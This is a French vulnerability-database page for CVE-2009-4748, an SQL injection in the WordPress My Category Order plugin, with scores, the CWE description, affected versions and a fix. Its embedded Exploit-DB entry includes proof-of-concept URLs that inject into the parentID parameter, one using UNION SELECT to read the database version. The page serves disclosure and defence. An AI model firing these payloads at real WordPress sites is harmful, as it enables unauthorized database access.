CVE-2009-4748 : Détail

CVE-2009-4748

SQL Injection
A03-Injection
0.06%V3
Network
2010-03-26
19h00 +00:00
2017-09-18
10h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

SQL injection vulnerability in mycategoryorder.php in the My Category Order plugin 2.8 and earlier for WordPress allows remote attackers to execute arbitrary SQL commands via the parentID parameter in an act_OrderCategories action to wp-admin/post-new.php.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 9150

Date de publication : 2009-07-14 22h00 +00:00
Auteur : Manh Luat
EDB Vérifié : Yes

############################### # Source: WordPress Plugin: My Category Order <= 2.8 (mycategoryorder.php) / SQL Injection Vulnerability # Download: http://wordpress.org/extend/plugins/my-category-order/ # No Dork # Author: ManhLuat93 [at] hcegroup[dot]net ############################### Errors appears only when you have admin control Open mycategoryorder.php (Line 47-48): if (isset($_GET['parentID'])) $parentID = $_GET['parentID']; Fix: if (isset($_GET['parentID'])) $parentID = intval($_GET['parentID']); [+] Exploit [+] http://localh0st/wp-admin/post-new.php?page=mycategoryorder&mode=act_OrderCategories&parentID=0'&idString=3,5,4,1 MySQL Query Error: WordPress database error: [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' ORDER BY term_order ASC' at line 1] SELECT * FROM wp_terms t inner join wp_term_taxonomy tt on t.term_id = tt.term_id WHERE taxonomy = 'category' and parent = 0' ORDER BY term_order ASC [+] http://localh0st/wp-admin/post-new.php?page=mycategoryorder&mode=act_OrderCategories&parentID=0 UNION SELECT 1,@@version,3,4,5,6,7,8,9,10,11--&idString=3,5,4,1 [+] What do you see ? # milw0rm.com [2009-07-15]

Products Mentioned

Configuraton 0

Andrew_charlton>>My_category_order >> Version To (including) 2.8

    Andrew_charlton>>My_category_order >> Version 2.6.1

      Andrew_charlton>>My_category_order >> Version 2.6.1a

        Andrew_charlton>>My_category_order >> Version 2.7

          Andrew_charlton>>My_category_order >> Version 2.7.1

            Wordpress>>Wordpress >> Version *

            Références

            http://www.exploit-db.com/exploits/9150
            Tags : exploit, x_refsource_EXPLOIT-DB
            http://www.securityfocus.com/bid/35704
            Tags : vdb-entry, x_refsource_BID